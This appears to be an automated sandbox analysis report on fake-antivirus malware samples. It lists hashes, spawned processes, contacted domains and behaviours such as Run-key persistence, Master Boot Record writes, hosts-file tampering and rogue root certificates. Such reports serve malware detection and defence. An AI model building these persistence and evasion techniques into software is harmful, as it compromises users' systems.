MD5 e3aa453a55638bcecc11958b116dc597
SHA1 224fa7cbc8bd7364894bf00532eb0f4ca6468e3f
SHA256 41f0a1b15dd35c2d25442b17bf16602cdaddbea176765b01e8633b20c7edd544
SHA512 443e0543e35b120062cd2cee9d9a96caa042c3c90870a537ae10ae39c6527d78d32824b5b5a1e84db394ce3d7e16d3880a705e74b461f108af5315413ea89970

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 5efd3ae592c00b1af85f29d01ea68ede
SHA1 6026df67033828a93f8aca97185740ec268c39c5
SHA256 ab0a0626af2d84239698869118d3302d8184c421094c1ebbf38fa9475ee9bb47
SHA512 7a39a47da47627478a0365d8751d824e990b470cceed7c2e46f44de70751191e85744e38331673fd3c0c3bf86f68b958b252c84ba0099c6079d66fb88f34287c

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 178c69ff569642a29d7e3e0d769ed1b6
SHA1 a132d6d0aa2d8b571ca6ae4d6edcc28ea13a8fa7
SHA256 f5e4ffe7bb46407aaee8789b6428dbbf0311957f63a23500b21bc6217f018d68
SHA512 6fc609ce963cf59889aca27ccbb592293b3b2d76cb1b1120e47598c1ff3974ece69fc402eb11a795bb7205faa2091a3518869f0c931b068d60bceb26653a0301

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

MD5 fc9ac26379524208bd455b861448bbeb
SHA1 54430990d0189a6b039e1daae7b374b55c88466a
SHA256 06afcdd746b7d79c8929ae2f1dd7b5ce521bd7becd1fdfe221c9474627239c5f
SHA512 3c78c5bd1ce833307144707b5c10839fd90ce66450c1e1e4dd6b60ac0a701b3db3b3ea2d3eb1c8db2424f2527e003e768cf59b4c720294ada2338c12ba262097

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

MD5 681abe65c2221b4836728a7675abcbc4
SHA1 be6e7dd30b388dd128497623bbf7371868a4623d
SHA256 8869fdd49509413447a06499efdc58e1275fc968fa58a04a1af642673d549a3e
SHA512 56dabd6426ddd43ff8889db2298d25c5d015332338c499cb0e06dc4a31fe305cf59e86405e2a37f06c66a6cac309615c0f9aabd0ccb6f1063a1b2b225670ad65

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833B

MD5 db09bd2b07eaf44f25aebcf9e35fffc7
SHA1 ee5620e85bcc2709fd42f8b0881da980d04d19b5
SHA256 19210beb9db1cae789065cffbd767bbf5c932b031d15a51bca1e4fd602009020
SHA512 2e790f721bb7d607ab20b7733d8ac2a3bdd992ef8c449a60239fb19d30f3478087d83f31f02c001f9e21e1be6afc9ceafc59f27f9fabbcd533f8e1e43ae444c0

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3ce7c53aeb9eab187048331c272f93f8
SHA1 0117ce4f2fca2c639b9dd8660ced380e1378075d
SHA256 7b2270e1167fc804237a32fad034394a785b1a406fcc13e1643f072a5de28dc7
SHA512 cb8bf524e32387eff7b1a6f4c7c828a3aa0aa7d3eaa006b6cbc0ec1381b23e972d122b490196448ea4c088150bd48fa5187bea70db5c15ebc41a0e36b8582abd

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9ea0503fd3c3bef899992de41094a480
SHA1 3e5b1ac4f18d0cbefd9f1a2a631e6592c6cb248d
SHA256 b128cc5ab1bd55d27d9a6675cd7e61fa59f65e4181946104775a4bb2295c4f21
SHA512 c95b794bffef19b55d475aee50bba3bf41bb7ff5ee2b45b28a0578911cb01bfd8a6a1db9ff35006b823409fcdcd3f94d5b6e8ca454803e04c2803134d4536bc0

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d481bfbddb70443c28cb2a9f0fa61e7e
SHA1 8846dc9a93edceafaf079bf70dcd8cf5f00abb42
SHA256 135ede8e1351c764b4a381687f8203ea86432a1ba072e81297c80675edc4c1cd
SHA512 754ebc8df2dc7ce253678070f7b14da4903ac79c0ba67b58c1603adaeb0ab90e49466a4f1883f9bc3c4b984c9d7d861fdd6a73f0e57ec979abe97e0d16e6de4a

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 11d92e1a68d26a59956082b62c2eafaf
SHA1 04cd9cb01e414161e5bb0d21899c99dc6291d7ac
SHA256 18fa8a791d338e48d2eb17759be9dc042a312909f3a6ac90e43afb931d47a87d
SHA512 3a97943d2143159453faab900c6083cc9c563cb8e251c3a72a0a3091a2ae9429c5a2f547c972e89f7b2595b80e5fbfb028e3d5e73c54e188a9e15a874572d70b

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 477111e39ebd454644e9c32e5b1f6f83
SHA1 3cc96bc51579e43cbaeeed1c3d1b10522ab64e62
SHA256 1ccfe9d47acaf0038f8dc13d214d23dccbbe48e0b8c5461c903443fb1e644402
SHA512 88f188f54704d021f02db1056876c04c9ceed337f8b595ad87700c971d4b124ae0c70d773a7ad84e8dad3968952e44cbe58c8e7387c4ad5a808fd7a85d3cccac

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 e9117b246600d04457dc58825bdc8b8c
SHA1 70ca6ff576281391cf7a0e86d2a6a0ef9205d919
SHA256 b2a94ad1cd5e92532171096eeeeda1a01a2408ebf0d636cba969338a8ee67edf
SHA512 ba29bb9c0b691e0d09208426a1cb17a74e8c9dca9cfd9dca1bed15fb3dd1cf476a28efee0237db1d23ef4ddbf0e30c74597524c003a568e509ba2c2eee0ad507

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 a359c2feb92e48101aecfbc2acd9d9f1
SHA1 cc138b30159b47d5e5c05ac35c9834ffb9472cbd
SHA256 ba5d5e0bfb584469b6a710ad8a6dbff91f88aa53f4a74049cfad16f3e1d365d8
SHA512 d36ab594e1ff1967b7b6b7d750b2225eec8633c4debe07d085cbc232ecca0fd57b6e45db297b67415a2db61657178e0d0831fe1edcb533afb636ff4716d40b02

Analysis: behavioral20

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\A: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Z: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\B: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\@VpnToastIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.ppt C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@AppHelpToast.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@AudioToastIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Error.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@EnrollmentToastIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\Bthprops\@BthpropsNotificationLogo.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\DefaultAccountTile.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.xls C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Alert.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\SysWOW64\@WirelessDisplayToast.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-32_altform-unplated_contrast-black.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Drops file in Windows directory


Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

C:\Users\Admin\AppData\Local\Temp\is-CB1BD.tmp\is-MLOMF.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CB1BD.tmp\is-MLOMF.tmp" /SL4 $301CA "C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe" 232353 52224

C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

"C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\is-CB1BD.tmp\is-MLOMF.tmp

MD5 0360b1d1195775766b2e78a7b463f658
SHA1 8e4b2b1b6d1e4446c979b0cea7db6db7eee21610
SHA256 bee86b674d51b4e21822e44f9408a69d60e282e39f5897888df334c74d840aa4
SHA512 23103b4457952091848f171f5c20351dd55ce1bce209da21c1b6792d6e0b13476a104698c31ad744df2df39408110d73f84b61e627bbb6d1d2a461db4370597d

C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

MD5 e1827fbbf959d7c5f3219a1f0b0c35fc
SHA1 677d7c6179729fdb4a25afdd5579533f1606c810
SHA256 c28ac5f267bec7650ce271c12b23f087f9c3927a46b48682e363581fa29e2a5d
SHA512 a65dc0550f9d1501add93390501027d83002c2df0df22bbf5d88dce9c98b6ebb4a2c297010e44cfebfaa8b7ba0f77ed12c2d13fb9b213e15c4b53dfd56ead0c3

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

33s

Max time network

36s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

Signatures

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Zwcd = "C:\\Windows\\SysWOW64\\KBDKORC.exe" C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\SysWOW64\KBDKORC.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

UPX packed file

upx

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\{56321-2157-3235-3211} = "C:\\Users\\Admin\\AppData\\Roaming\\RtlDriver32.exe" C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\physicaldrive0 C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\KBDKORC.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
File opened for modification C:\Windows\SysWOW64\KBDKORC.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D\Blob = 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 C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\RtlDriver32.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\RtlDriver32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\KBDKORC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 2244 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1280 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\KBDKORC.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1968 wrote to memory of 1616 N/A C:\Windows\SysWOW64\KBDKORC.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2716 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\AV2.EXE C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe
PID 2352 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\AV.EXE C:\Users\Admin\AppData\Roaming\RtlDriver32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

C:\Users\Admin\AppData\Local\Temp\AV.EXE

"C:\Users\Admin\AppData\Local\Temp\AV.EXE"

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

"C:\Users\Admin\AppData\Local\Temp\AV2.EXE"

C:\Users\Admin\AppData\Local\Temp\DB.EXE

"C:\Users\Admin\AppData\Local\Temp\DB.EXE"

C:\Users\Admin\AppData\Local\Temp\EN.EXE

"C:\Users\Admin\AppData\Local\Temp\EN.EXE"

C:\Users\Admin\AppData\Local\Temp\SB.EXE

"C:\Users\Admin\AppData\Local\Temp\SB.EXE"

C:\Windows\SysWOW64\KBDKORC.exe

C:\Windows\SysWOW64\KBDKORC.exe

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\system32\ipconfig.exe" /flushdns

C:\Windows\SysWOW64\cmd.exe

/c C:\Users\Admin\AppData\Local\Temp\~unins2362.bat "C:\Users\Admin\AppData\Local\Temp\DB.EXE"

C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe

"C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe" "C:\Users\Admin\AppData\Local\Temp\AV2.EXE"

C:\Users\Admin\AppData\Roaming\RtlDriver32.exe

"C:\Users\Admin\AppData\Roaming\RtlDriver32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 middlechrist.com udp
US 8.8.8.8:53 aeravine.com udp
US 66.96.162.135:80 middlechrist.com tcp
US 8.8.8.8:53 imagehut4.cn udp
US 137.175.35.119:80 imagehut4.cn tcp
US 8.8.8.8:53 aeravine.com udp
US 8.8.8.8:53 bemachin.com udp
NL 178.162.174.147:80 178.162.174.147 tcp

Files

\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 f284568010505119f479617a2e7dc189
SHA1 e23707625cce0035e3c1d2255af1ed326583a1ea
SHA256 26c8f13ea8dc17443a9fa005610537cb6700aebaf748e747e9278d504e416eb1
SHA512 ebe96e667dfde547c5a450b97cd7534b977f4073c7f4cbc123a0e00baaefeb3be725c1cafbfb5bb040b3359267954cd1b4e2094ef71fc273732016ee822064bf

C:\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 6be30106ab1a102d1e71454880c03ab5
SHA1 8aa4d38d9b7e5c31508adf94e8a582cff7301066
SHA256 80cd1cb55b51d87f316748e04e600671c6be78be56739b8dac6a483da4623bf6
SHA512 e9d98bdecac318b752718f2b7222973c6eaa79ed9ac836f6ba2cb234fbbeb0f712831be8cf90547b8313ff355c4a20eab304e778c6eca83cde190156014ca686

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

MD5 68fc5382721ce31345378b910e468290
SHA1 8eb5c95adf51dfcddd61ae130cf3d05641dedc4e
SHA256 d8a11a901f9a5a0280e69015d7adb103509af7b03c7b8fd6fbbcd3796140d7cd
SHA512 527dbbaefdc088c473544619467c68c1069af81b61571741379d25168c5b8bc207871a59de1806526c253eb5d1bd0dad335291d885445c83cd4cd5b91eb3f8dd

C:\Users\Admin\AppData\Local\Temp\DB.EXE

MD5 c6746a62feafcb4fca301f606f7101fa
SHA1 e09cd1382f9ceec027083b40e35f5f3d184e485f
SHA256 b5a255d0454853c8afc0b321e1d86dca22c3dbefb88e5d385d2d72f9bc0109e6
SHA512 ee5dfa08c86bf1524666f0851c729970dbf0b397db9595a2bae01516299344edb68123e976592a83e492f2982fafe8d350ba2d41368eb4ecf4e6fe12af8f5642

\Users\Admin\AppData\Local\Temp\DB.EXE

MD5 9ea24c6453476b84947f59fa6286c67a
SHA1 915955825965f38523846f773d983c8085db8530
SHA256 da2f099f5ccef5a576f5c41f17887ab3430834cf4ee621ed578e334662b70e0b
SHA512 f0a4ab2c9032c84c4106493bdfe62659c4caaeb35a4cee85ea8aa2b20d5520b2be071115810f6421a983e4d67df47b58db2f0dd00f11f389ae739ffa5cb77332

C:\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 e1695d64b6dd90ccac31749222fd81d5
SHA1 a8596a81035087de73875bfc5a5edc8b93488d06
SHA256 11338bf7b938c0e52392961e20511c25e05eb82f978da277fc1e46e764170805
SHA512 5092bcc022218c40b4b759dbbac1ba0b2d9cf364d58b8e88905823663c6d9a2a96cced62bcefa8008317cba38945ea929815ed9c463a66824800ffe700c7011c

memory/1280-27-0x0000000000260000-0x00000000002F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SB.EXE

MD5 9252e1be9776af202d6ad5c093637022
SHA1 6cc686d837cd633d9c2e8bc1eaba5fc364bf71d8
SHA256 ce822ff86e584f15b6abd14c61453bd3b481d4ec3fdeb961787fceb52acd8bd6
SHA512 98b1b3ce4d16d36f738478c6cf41e8f4a57d3a5ecfa8999d45592f79a469d8af8554bf4d5db34cb79cec71ce103f4fde1b41bd3cce30714f803e432e53da71ea

C:\Users\Admin\AppData\Local\Temp\EN.EXE

MD5 621f2279f69686e8547e476b642b6c46
SHA1 66f486cd566f86ab16015fe74f50d4515decce88
SHA256 c17a18cf2c243303b8a6688aad83b3e6e9b727fcd89f69065785ef7f1a2a3e38
SHA512 068402b02f1056b722f21b0a354b038f094d02e4a066b332553cd6b36e3640e8f35aa0499a2b057c566718c3593d3cea6bbabd961e04f0a001fd45d8be8e1c4e

